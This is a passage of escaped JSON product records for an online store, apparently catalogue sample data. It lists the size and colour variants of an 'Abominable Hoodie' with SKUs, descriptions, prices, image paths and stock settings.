",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"134\":{\"sku\":\"MH09-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Abominable Hoodie-M-Blue\",\"description\":\"<p>It took CoolTech&trade; weather apparel know-how and lots of wind-resistant fabric to get the Abominable Hoodie just right. It\'s aggressively warm when it needs to be, while maintaining your comfort in milder climes.<\\/p>\\n<p>&bull; Blue heather hoodie.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Moisture-wicking. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"abominable-hoodie-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh09-blue_alt1.jpg,\\/m\\/h\\/mh09-blue_back.jpg\",\"image\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh09-blue_alt1.jpg,\\/m\\/h\\/mh09-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"135\":{\"sku\":\"MH09-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Abominable Hoodie-M-Green\",\"description\":\"<p>It took CoolTech&trade; weather apparel know-how and lots of wind-resistant fabric to get the Abominable Hoodie just right. It\'s aggressively warm when it needs to be, while maintaining your comfort in milder climes.<\\/p>\\n<p>&bull; Blue heather hoodie.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Moisture-wicking. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"abominable-hoodie-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh09-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh09-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh09-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh09-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh09-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"136\":{\"sku\":\"MH09-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Abominable Hoodie-M-Red\",\"description\":\"<p>It took CoolTech&trade; weather apparel know-how and lots of wind-resistant fabric to get the Abominable Hoodie just right. It\'s aggressively warm when it needs to be, while maintaining your comfort in milder climes.<\\/p>\\n<p>&bull; Blue heather hoodie.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Moisture-wicking. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"abominable-hoodie-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh09-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh09-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh09-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh09-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh09-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"137\":{\"sku\":\"MH09-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Abominable Hoodie-L-Blue\",\"description\":\"<p>It took CoolTech&trade; weather apparel know-how and lots of wind-resistant fabric to get the Abominable Hoodie just right. It\'s aggressively warm when it needs to be, while maintaining your comfort in milder climes.<\\/p>\\n<p>&bull; Blue heather hoodie.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Moisture-wicking. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"abominable-hoodie-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh09-blue_alt1.jpg,\\/m\\/h\\/mh09-blue_back.jpg\",\"image\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh09-blue_alt1.jpg,\\/m\\/h\\/mh09-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"138\":{\"sku\":\"MH09-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Abominable Hoodie-L-Green\",\"description\":\"<p>It took CoolTech&trade; weather apparel know-how and lots of wind-resistant fabric to get the Abominable Hoodie just right. It\'s aggressively warm when it needs to be, while maintaining your comfort in milder climes.<\\/p>\\n<p>&bull; Blue heather hoodie.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Moisture-wicking. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"abominable-hoodie-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh09-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh09-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh09-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh09-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh09-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"139\":{\"sku\":\"MH09-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Abominable Hoodie-L-Red\",\"description\":\"<p>It took CoolTech&trade; weather apparel know-how and lots of wind-resistant fabric to get the Abominable Hoodie just right. It\'s aggressively warm when it needs to be, while maintaining your comfort in milder climes.<\\/p>\\n<p>&bull; Blue heather hoodie.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Moisture-wicking. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"abominable-hoodie-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh09-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh09-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh09-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh09-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh09-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"140\":{\"sku\":\"MH09-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Abominable Hoodie-XL-Blue\",\"description\":\"<p>It took CoolTech&trade; weather apparel know-how and lots of wind-resistant fabric to get the Abominable Hoodie just right. It\'s aggressively warm when it needs to be, while maintaining your comfort in milder climes.<\\/p>\\n<p>&bull; Blue heather hoodie.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Moisture-wicking. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"abominable-hoodie-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh09-blue_alt1.jpg,\\/m\\/h\\/mh09-blue_back.jpg\",\"image\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh09-blue_alt1.jpg,\\/m\\/h\\/mh09-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"141\":{\"sku\":\"MH09-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Abominable Hoodie-XL-Green\",\"description\":\"<p>It took CoolTech&trade; weather apparel know-how and lots of wind-resistant fabric to get the Abominable Hoodie just right. It\'s aggressively warm when it needs to be, while maintaining your comfort in milder climes.<\\/p>\\n<p>&bull; Blue heather hoodie.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Moisture-wicking. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"abominable-hoodie-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh09-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh09-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh09-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh09-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh09-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"142\":{\"sku\":\"MH09-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Abominable Hoodie-XL-Red\",\"description\":\"<p>It took CoolTech&trade; weather apparel know-how and lots of wind-resistant fabric to get the Abominable Hoodie just right. It\'s aggressively warm when it needs to be, while maintaining your comfort in milder climes.<\\/p>\\n<p>&bull; Blue heather hoodie.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Moisture-wicking. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"abominable-hoodie-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh09-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh09-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh09-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh09-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh09-red_main.jpg\",\"thumbn